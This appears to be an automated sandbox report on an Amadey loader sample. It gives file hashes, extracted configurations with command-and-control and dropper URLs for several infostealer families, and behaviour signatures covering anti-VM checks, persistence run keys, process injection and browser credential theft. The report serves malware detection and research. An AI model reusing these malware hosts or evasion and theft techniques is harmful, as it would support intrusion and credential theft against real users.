amadey | 0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483

Resubmissions

21-02-2025 13:19

250221-qkqm1sskh1 10

21-02-2025 12:51

250221-p3vt1ssmek 10

20-02-2025 14:07

250220-rey8mswqdj 10

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
20-02-2025 14:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Size

2.1MB
MD5

f22b0344fefdf201d07314323a83b022
SHA1

6dde721e943cb298e50446083c1d7260071aaaae
SHA256

0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483
SHA512

61f92704af7395159edb879fe394a64e30b0b0818d642be1eeecafeee54e22570add0e4eac88c83e00cd9a4642e09a8529c77a69b4b7613bc3bcb9f78f50feac
SSDEEP

49152:vDB/YpemdpJhhEwrtke2DSl/YKH7vOITWMPnzZPoc9j:9/kXhEikRDS/bvOIbPnzZxj

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Extracted

Family

redline

Botnet

cheat

103.84.89.222:33791

Extracted

Family

stealc

Botnet

default

http://ecozessentials.com

Attributes

url_path
/e6cb1c8fc7cd1659.php

Extracted

Family

vidar

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

cryptbot

http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk17

Extracted

Family

lumma

https://penetratebatt.pw/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
CryptBot
CryptBot is a C++ stealer distributed widely in bundle with other software.
spyware stealer cryptbot
Cryptbot family
cryptbot

Detect Vidar Stealer 11 IoCs

stealer

resource	yara_rule
behavioral2/memory/4952-277-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral2/memory/4952-275-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral2/memory/4952-609-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral2/memory/4952-610-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral2/memory/4952-625-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral2/memory/4952-626-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral2/memory/4952-701-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral2/memory/4952-702-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral2/memory/4952-705-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral2/memory/4952-709-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral2/memory/4952-725-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral2/memory/2564-44-0x0000000000E50000-0x00000000012C8000-memory.dmp	family_sectoprat
behavioral2/memory/2564-45-0x0000000000E50000-0x00000000012C8000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	d8d9d722e7.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 18 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d8d9d722e7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5f4850135f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5ea96f5877.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	06fe742185.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e954955770.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e189d890b8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f2af1d7928.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6ff8aa0de2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	MAl7pjE.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d7cec70240.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempG7Z2QQMGPW3QVAVLK4JVLARPY4MMNXCX.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5412289161.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d9b3cb7467.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8b0a647b34.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
323	2832	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2832	powershell.exe

Downloads MZ/PE file 28 IoCs

flow	pid	Process
21	2148	skotes.exe
72	5100	futors.exe
323	2832	powershell.exe
17	2148	skotes.exe
17	2148	skotes.exe
17	2148	skotes.exe
17	2148	skotes.exe
17	2148	skotes.exe
17	2148	skotes.exe
17	2148	skotes.exe
17	2148	skotes.exe
17	2148	skotes.exe
17	2148	skotes.exe
17	2148	skotes.exe
17	2148	skotes.exe
17	2148	skotes.exe
17	2148	skotes.exe
17	2148	skotes.exe
17	2148	skotes.exe
46	5100	futors.exe
46	5100	futors.exe
46	5100	futors.exe
46	5100	futors.exe
132	5100	futors.exe
226	1704	BitLockerToGo.exe
234	2148	skotes.exe
234	2148	skotes.exe
234	2148	skotes.exe

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
4184	chrome.exe
740	chrome.exe
2912	chrome.exe
3552	chrome.exe
2732	chrome.exe
556	chrome.exe
3672	chrome.exe
868	chrome.exe

Checks BIOS information in registry 2 TTPs 36 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d7cec70240.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempG7Z2QQMGPW3QVAVLK4JVLARPY4MMNXCX.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5412289161.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d9b3cb7467.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6ff8aa0de2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f2af1d7928.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5f4850135f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	06fe742185.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e954955770.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d9b3cb7467.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MAl7pjE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MAl7pjE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	06fe742185.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6ff8aa0de2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempG7Z2QQMGPW3QVAVLK4JVLARPY4MMNXCX.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e189d890b8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f2af1d7928.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d8d9d722e7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d8d9d722e7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5f4850135f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e954955770.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8b0a647b34.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e189d890b8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d7cec70240.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5ea96f5877.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5ea96f5877.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5412289161.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8b0a647b34.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation	sQ3DZPU.exe
Key value queried	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation	d8d9d722e7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe

Executes dropped EXE 56 IoCs

pid	Process
2148	skotes.exe
2564	8b0a647b34.exe
2464	e189d890b8.exe
4060	amnew.exe
5100	futors.exe
4992	f2af1d7928.exe
2256	DTQCxXZ.exe
412	7aencsM.exe
724	trano1221.exe
4952	7aencsM.exe
4396	trano1221.exe
316	con12312211221.exe
8	con12312211221.exe
5096	monthdragon.exe
3592	monthdragon.exe
1876	monthdragon.exe
4000	dzvh4HC.exe
3520	12321321.exe
2824	Bjkm5hE.exe
3300	Bjkm5hE.exe
4320	f3Ypd8O.exe
4652	f3Ypd8O.exe
2484	alex12112.exe
2976	alex12112.exe
4124	alex12112.exe
2516	alex12112.exe
540	MAl7pjE.exe
4352	fher.exe
1304	fher.exe
3796	fher.exe
724	d7cec70240.exe
1752	skotes.exe
912	d8d9d722e7.exe
2824	NL58452.exe
2016	NL58452.exe
880	NL58452.exe
1780	futors.exe
4336	sQ3DZPU.exe
1628	5f4850135f.exe
400	06fe742185.exe
184	e954955770.exe
4244	apisysDirectx.exe
920	aca90f55db.exe
432	service123.exe
3684	8be69e5da4.exe
4488	6ff8aa0de2.exe
4184	5ea96f5877.exe
4220	d2d2d358d6.exe
1128	5e3f33cac2.exe
5584	TempG7Z2QQMGPW3QVAVLK4JVLARPY4MMNXCX.EXE
5216	skotes.exe
5720	apisysDirectx.exe
4024	futors.exe
5140	service123.exe
5252	5412289161.exe
3160	d9b3cb7467.exe

Identifies Wine through registry keys 2 TTPs 18 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	5ea96f5877.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	6ff8aa0de2.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	e189d890b8.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	MAl7pjE.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	5f4850135f.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	8b0a647b34.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	f2af1d7928.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	d7cec70240.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	06fe742185.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	e954955770.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	d8d9d722e7.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	TempG7Z2QQMGPW3QVAVLK4JVLARPY4MMNXCX.EXE
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	5412289161.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	d9b3cb7467.exe

Loads dropped DLL 33 IoCs

pid	Process
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
4396	trano1221.exe
432	service123.exe
5140	service123.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d8d9d722e7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10009640101\\d8d9d722e7.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5f4850135f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10009650101\\5f4850135f.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6ff8aa0de2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089293001\\6ff8aa0de2.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5ea96f5877.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089294001\\5ea96f5877.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d2d2d358d6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089295001\\d2d2d358d6.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e3f33cac2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089296001\\5e3f33cac2.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0008000000023dbe-962.dat	autoit_exe
behavioral2/files/0x0008000000023dc4-979.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs

pid	Process
1508	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
2148	skotes.exe
2564	8b0a647b34.exe
2464	e189d890b8.exe
4992	f2af1d7928.exe
540	MAl7pjE.exe
724	d7cec70240.exe
1752	skotes.exe
912	d8d9d722e7.exe
1628	5f4850135f.exe
400	06fe742185.exe
184	e954955770.exe
4488	6ff8aa0de2.exe
4184	5ea96f5877.exe
5584	TempG7Z2QQMGPW3QVAVLK4JVLARPY4MMNXCX.EXE
5216	skotes.exe
5252	5412289161.exe
3160	d9b3cb7467.exe

Suspicious use of SetThreadContext 12 IoCs

description	pid	Process	procid_target
PID 412 set thread context of 4952	412	7aencsM.exe	99
PID 316 set thread context of 8	316	con12312211221.exe	104
PID 5096 set thread context of 1876	5096	monthdragon.exe	110
PID 2824 set thread context of 3300	2824	Bjkm5hE.exe	119
PID 4320 set thread context of 4652	4320	f3Ypd8O.exe	123
PID 2484 set thread context of 2516	2484	alex12112.exe	129
PID 4352 set thread context of 1304	4352	fher.exe	135
PID 2824 set thread context of 880	2824	NL58452.exe	154
PID 1628 set thread context of 1704	1628	5f4850135f.exe	176
PID 920 set thread context of 5512	920	aca90f55db.exe	224
PID 5252 set thread context of 6008	5252	5412289161.exe	226
PID 3160 set thread context of 5976	3160	d9b3cb7467.exe	227

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023dc3-289.dat	upx
behavioral2/memory/4396-293-0x00007FF8095D0000-0x00007FF809BB9000-memory.dmp	upx
behavioral2/files/0x0007000000023d79-295.dat	upx
behavioral2/files/0x0007000000023dbf-300.dat	upx
behavioral2/memory/4396-334-0x00007FF81F010000-0x00007FF81F029000-memory.dmp	upx
behavioral2/memory/4396-335-0x00007FF81F200000-0x00007FF81F20D000-memory.dmp	upx
behavioral2/memory/4396-336-0x00007FF81DD30000-0x00007FF81DD49000-memory.dmp	upx
behavioral2/memory/4396-337-0x00007FF819A70000-0x00007FF819A9D000-memory.dmp	upx
behavioral2/memory/4396-303-0x00007FF820D80000-0x00007FF820D8F000-memory.dmp	upx
behavioral2/memory/4396-338-0x00007FF8195B0000-0x00007FF8195E6000-memory.dmp	upx
behavioral2/memory/4396-302-0x00007FF81DCC0000-0x00007FF81DCE3000-memory.dmp	upx
behavioral2/memory/4396-339-0x00007FF81D980000-0x00007FF81D98D000-memory.dmp	upx
behavioral2/memory/4396-340-0x00007FF819290000-0x00007FF8192C3000-memory.dmp	upx
behavioral2/memory/4396-342-0x00007FF818DC0000-0x00007FF818E8D000-memory.dmp	upx
behavioral2/memory/4396-341-0x00007FF8095D0000-0x00007FF809BB9000-memory.dmp	upx
behavioral2/memory/4396-345-0x00007FF81DCC0000-0x00007FF81DCE3000-memory.dmp	upx
behavioral2/memory/4396-344-0x00007FF8090B0000-0x00007FF8095D0000-memory.dmp	upx
behavioral2/memory/4396-346-0x00007FF809FC0000-0x00007FF80A08F000-memory.dmp	upx
behavioral2/memory/4396-347-0x00007FF81F010000-0x00007FF81F029000-memory.dmp	upx
behavioral2/memory/4396-350-0x00007FF81CCF0000-0x00007FF81CD04000-memory.dmp	upx
behavioral2/memory/4396-349-0x00007FF81F200000-0x00007FF81F20D000-memory.dmp	upx
behavioral2/memory/4396-348-0x00007FF819200000-0x00007FF819287000-memory.dmp	upx
behavioral2/memory/4396-351-0x00007FF81DD30000-0x00007FF81DD49000-memory.dmp	upx
behavioral2/memory/4396-353-0x00007FF819A70000-0x00007FF819A9D000-memory.dmp	upx
behavioral2/memory/4396-356-0x00007FF809EA0000-0x00007FF809FBC000-memory.dmp	upx
behavioral2/memory/4396-355-0x00007FF8195B0000-0x00007FF8195E6000-memory.dmp	upx
behavioral2/memory/4396-354-0x00007FF819580000-0x00007FF8195A6000-memory.dmp	upx
behavioral2/memory/4396-352-0x00007FF81D970000-0x00007FF81D97B000-memory.dmp	upx
behavioral2/memory/4396-357-0x00007FF81D980000-0x00007FF81D98D000-memory.dmp	upx
behavioral2/memory/4396-358-0x00007FF818BA0000-0x00007FF818BE3000-memory.dmp	upx
behavioral2/memory/4396-361-0x00007FF818DA0000-0x00007FF818DB2000-memory.dmp	upx
behavioral2/memory/4396-359-0x00007FF819290000-0x00007FF8192C3000-memory.dmp	upx
behavioral2/memory/4396-362-0x00007FF818DC0000-0x00007FF818E8D000-memory.dmp	upx
behavioral2/memory/4396-363-0x00007FF818B70000-0x00007FF818B94000-memory.dmp	upx
behavioral2/memory/4396-365-0x00007FF808E60000-0x00007FF8090A9000-memory.dmp	upx
behavioral2/memory/4396-364-0x00007FF8090B0000-0x00007FF8095D0000-memory.dmp	upx
behavioral2/memory/4396-366-0x00007FF809FC0000-0x00007FF80A08F000-memory.dmp	upx
behavioral2/memory/4396-367-0x00007FF818AC0000-0x00007FF818AEE000-memory.dmp	upx
behavioral2/memory/4396-368-0x00007FF80FA90000-0x00007FF80FB4C000-memory.dmp	upx
behavioral2/memory/4396-369-0x00007FF816B70000-0x00007FF816B9B000-memory.dmp	upx
behavioral2/memory/4396-402-0x00007FF809FC0000-0x00007FF80A08F000-memory.dmp	upx
behavioral2/memory/4396-406-0x00007FF819580000-0x00007FF8195A6000-memory.dmp	upx
behavioral2/memory/4396-413-0x00007FF80FA90000-0x00007FF80FB4C000-memory.dmp	upx
behavioral2/memory/4396-416-0x00007FF81CCF0000-0x00007FF81CD04000-memory.dmp	upx
behavioral2/memory/4396-415-0x00007FF8090B0000-0x00007FF8095D0000-memory.dmp	upx
behavioral2/memory/4396-414-0x00007FF816B70000-0x00007FF816B9B000-memory.dmp	upx
behavioral2/memory/4396-411-0x00007FF808E60000-0x00007FF8090A9000-memory.dmp	upx
behavioral2/memory/4396-410-0x00007FF818B70000-0x00007FF818B94000-memory.dmp	upx
behavioral2/memory/4396-409-0x00007FF818DA0000-0x00007FF818DB2000-memory.dmp	upx
behavioral2/memory/4396-408-0x00007FF818BA0000-0x00007FF818BE3000-memory.dmp	upx
behavioral2/memory/4396-407-0x00007FF809EA0000-0x00007FF809FBC000-memory.dmp	upx
behavioral2/memory/4396-405-0x00007FF81D970000-0x00007FF81D97B000-memory.dmp	upx
behavioral2/memory/4396-403-0x00007FF819200000-0x00007FF819287000-memory.dmp	upx
behavioral2/memory/4396-400-0x00007FF818DC0000-0x00007FF818E8D000-memory.dmp	upx
behavioral2/memory/4396-399-0x00007FF819290000-0x00007FF8192C3000-memory.dmp	upx
behavioral2/memory/4396-398-0x00007FF81D980000-0x00007FF81D98D000-memory.dmp	upx
behavioral2/memory/4396-397-0x00007FF8195B0000-0x00007FF8195E6000-memory.dmp	upx
behavioral2/memory/4396-396-0x00007FF819A70000-0x00007FF819A9D000-memory.dmp	upx
behavioral2/memory/4396-395-0x00007FF81DD30000-0x00007FF81DD49000-memory.dmp	upx
behavioral2/memory/4396-394-0x00007FF81F200000-0x00007FF81F20D000-memory.dmp	upx
behavioral2/memory/4396-393-0x00007FF81F010000-0x00007FF81F029000-memory.dmp	upx
behavioral2/memory/4396-392-0x00007FF820D80000-0x00007FF820D8F000-memory.dmp	upx
behavioral2/memory/4396-391-0x00007FF81DCC0000-0x00007FF81DCE3000-memory.dmp	upx
behavioral2/memory/4396-390-0x00007FF8095D0000-0x00007FF809BB9000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0008000000023d4f-146.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 10 IoCs

pid	pid_target	Process	procid_target
316	2464	WerFault.exe	88
736	412	WerFault.exe	98
1348	316	WerFault.exe	103
4500	5096	WerFault.exe	108
2424	2824	WerFault.exe	118
1920	4320	WerFault.exe	122
4180	2484	WerFault.exe	126
1600	4352	WerFault.exe	133
2236	2824	WerFault.exe	152
2024	912	WerFault.exe	151

System Location Discovery: System Language Discovery 1 TTPs 60 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7aencsM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8be69e5da4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5e3f33cac2.exe
